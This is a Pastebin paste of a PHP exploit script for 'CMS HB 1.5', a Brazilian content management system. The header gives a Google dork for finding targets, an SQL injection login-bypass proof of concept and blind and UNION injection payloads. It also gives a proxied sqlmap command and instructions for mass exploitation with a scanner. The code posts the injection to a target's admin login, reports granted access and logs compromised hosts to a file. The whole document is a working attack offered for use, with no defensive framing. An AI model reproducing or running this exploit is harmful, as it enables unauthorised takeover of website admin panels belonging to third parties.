SHARE
TWEET

[EXPLOIT] XPL 0day CMS HB 1.5

Googleinurl May 10th, 2015 (edited) 121 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. /*
  4.   [+] Discoverer Author: M3t4tr0n
  5.   [+] FACEBOOK:    https://www.facebook.com/M3T4TR0N
  6.   [+] EMAIL:       rammstain960@gmail.com
  7.   [*] Thanks M3t4tr0n
  8.   [*] Neither war between hackers, nor peace for the system.
  9.   ------------------------------------------------------------------------------
  10.  
  11.   # SCRIPT by:     [ I N U R L  -  B R A S I L ] - [ By GoogleINURL ]
  12.   # EXPLOIT NAME:  XPL 0day CMS HB 1.5 / INURL BRASIL
  13.   # AUTOR:         Cleiton Pinheiro / Nick: googleINURL
  14.   # Email:         inurlbr@gmail.com
  15.   # Blog:          http://blog.inurl.com.br
  16.   # Twitter:       https://twitter.com/googleinurl
  17.   # Fanpage:       https://fb.com/InurlBrasil
  18.   # Pastebin       http://pastebin.com/u/Googleinurl
  19.   # GIT:           https://github.com/googleinurl
  20.   # PSS:           http://packetstormsecurity.com/user/googleinurl
  21.   # EA:            http://exploit4arab.net/author/248/Cleiton_Pinheiro
  22.   # YOUTUBE:       http://youtube.com/c/INURLBrasil
  23.   # PLUS:          http://google.com/+INURLBrasil
  24.   ------------------------------------------------------------------------------
  25.  
  26.   # FAILURE REPORTED: 15/maio/2015
  27.  
  28.   # ADMINISTRATIVE ACCESS PANEL
  29.  
  30.   # Vendor:        http://www.hbwebecia.com.br/
  31.   # CMS HB 1.5
  32.  
  33.   # Google Dork:   inurl:base.php?pagina
  34.  
  35.   # FILE VULN      /admin/logar.phpxx
  36.   # POC:          (POST)http://{YOU_URL}/admin/logar.php?login='=' 'or'&senha='=' 'or'&Submit3=Entrar
  37.  
  38.   # FILE VULN      /base.php
  39.   # POC:          (GET)http://{YOU_URL}/base.php?pagina=noticia&id=1 + (SQLI)
  40.  
  41.   # Type: boolean-based blind
  42.   Title: AND boolean-based blind - WHERE or HAVING clause
  43.   Payload: pagina=noticia&id=114' AND 1866=1866 AND 'qvCe'='qvCe
  44.  
  45.   # Type: AND/OR time-based blind
  46.   Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  47.   Payload: pagina=noticia&id=114' AND (SELECT * FROM (SELECT(SLEEP(5)))MPQc) AND 'MJVC'='MJVC
  48.  
  49.   # Type: UNION query
  50.   Title: Generic UNION query (NULL) - 7 columns
  51.   Payload: pagina=noticia&id=114' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a786b71,0x664a78565a7276576e76,0x71787a7871),NULL,NULL--
  52.  
  53.    # USE SQLMAP:
  54.   ./sqlmap.py -u 'http://{YOU_URL}/base.php?pagina=noticia&id=1'  //
  55.   --dbs --random-agent --level 3 --risk 2  --proxy 'http://localhost:8118' //
  56.   --dbms='MySQL' --threads 3 --time-sec 10 --identify-waf --text-only //
  57.   --flush-session --batch
  58.  
  59.   # EXECUTE:       php xpl.php -t http://target.us
  60.  
  61.   # FILE_OUTPUT :  HB.txt
  62.  
  63.   # EXPLOIT MASS USE SCANNER INURLBR
  64.   php inurlbr.php --dork 'inurl:base.php?pagina" ext:php' -s output.txt  --command-all 'php xpl.php -t _TARGET_'
  65.   More details about inurlbr scanner: https://github.com/googleinurl/SCANNER-INURLBR
  66.   ------------------------------------------------------------------------------
  67.  
  68.  
  69.  */
  70. error_reporting(1);
  71. set_time_limit(0);
  72. ini_set('display_errors', 1);
  73. ini_set('max_execution_time', 0);
  74. ini_set('allow_url_fopen', 1);
  75. ob_implicit_flush(true);
  76. ob_end_flush();
  77.  
  78. $op_ = getopt('f:t:', array('help::'));
  79. echo "[+] [Exploit]: XPL 0day CMS HB 1.5 / INURL BRASIL \n";
  80. $menu = "
  81.    -t : SET TARGET.
  82.    Execute:
  83.                  php xpl.php -t target
  84.                  php xpl.php -t target/path
  85. \n";
  86. echo isset($op_['help']) ? exit($menu) : NULL;
  87. $params = array(
  88.     'host' => not_isnull_empty($op_['t']) ? (strstr($op_['t'], 'http') ? $op_['t'] : "http://{$op_['t']}") : exit("\n[x] [ERRO] DEFINE TARGET!\n"),
  89.     'line' => "-----------------------------------------------------------------------------------------------"
  90. );
  91.  
  92. function __plus() {
  93.     ob_flush();
  94.     flush();
  95. }
  96.  
  97. function not_isnull_empty($valor = NULL) {
  98.     RETURN !is_null($valor) && !empty($valor) ? TRUE : FALSE;
  99. }
  100.  
  101. function __request($params) {
  102.     $objcurl = curl_init();
  103.     curl_setopt($objcurl, CURLOPT_URL, "{$params['host']}/admin/logar.php");
  104.     curl_setopt($objcurl, CURLOPT_USERAGENT, "Mozilla/" . rand(1, 50) . ".0 (compatible; MSIE " . rand(1, 50) . "." . rand(1, 50) . "1; Windows NT " . rand(1, 50) . ".0)");
  105.     curl_setopt($objcurl, CURLOPT_POST, 1);
  106.     curl_setopt($objcurl, CURLOPT_TIMEOUT, 5);
  107.     curl_setopt($objcurl, CURLOPT_POSTFIELDS, array('login' => "'=' 'or'", 'senha' => "'=' 'or'", 'Submit3' => 'Entrar'));
  108.     curl_setopt($objcurl, CURLOPT_SSL_VERIFYPEER, 0);
  109.     curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0);
  110.     curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
  111.     curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 5);
  112.     curl_setopt($objcurl, CURLOPT_FRESH_CONNECT, 1);
  113.  
  114.     $info[0] = curl_exec($objcurl);
  115.     $info[1] = curl_getinfo($objcurl);
  116.     $info[2] = curl_error($objcurl);
  117.  
  118.     curl_close($objcurl) . __plus();
  119.     unset($objcurl);
  120.  
  121.     return $info;
  122. }
  123.  
  124. print "\n" . date("h:m:s") . " [+][XPL SEND POST]: array('login' => \"'=' 'or'\", 'senha' => \"'=' 'or'\", 'Submit3' => 'Entrar')";
  125.  
  126. $_h = __request($params);
  127.  
  128. if (strstr($_h[1]['redirect_url'], '/admin/index.php')) {
  129.    
  130.     print "\n" . date("h:m:s") . " [+][RETURN]:: ACCESS GRANTED!";
  131.     print "\n" . date("h:m:s") . " [+][URL]:: {$params['host']}/admin/index.php [ OK ]";
  132.     print "\n" . date("h:m:s") . " [+][LOGIN]:: '=' 'or'";
  133.     print "\n" . date("h:m:s") . " [+][SENHA]:: '=' 'or' \n{$params['line']}\n";
  134.     file_put_contents("HB.txt", "{$params['host']} -  LOGIN: '=' 'or' / SENHA: '=' 'or'\n\n", FILE_APPEND);
  135.     __plus();
  136. } else {
  137.    
  138.     print "\n" . date("h:m:s") . " [x][NOT VULN] " . (isset($_h[2]) && !empty($_h[2]) ? " - [DETAILS]::{$_h[2]}" : NULL) . "\n{$params['line']}\n\n";
  139. }
RAW Paste Data
Top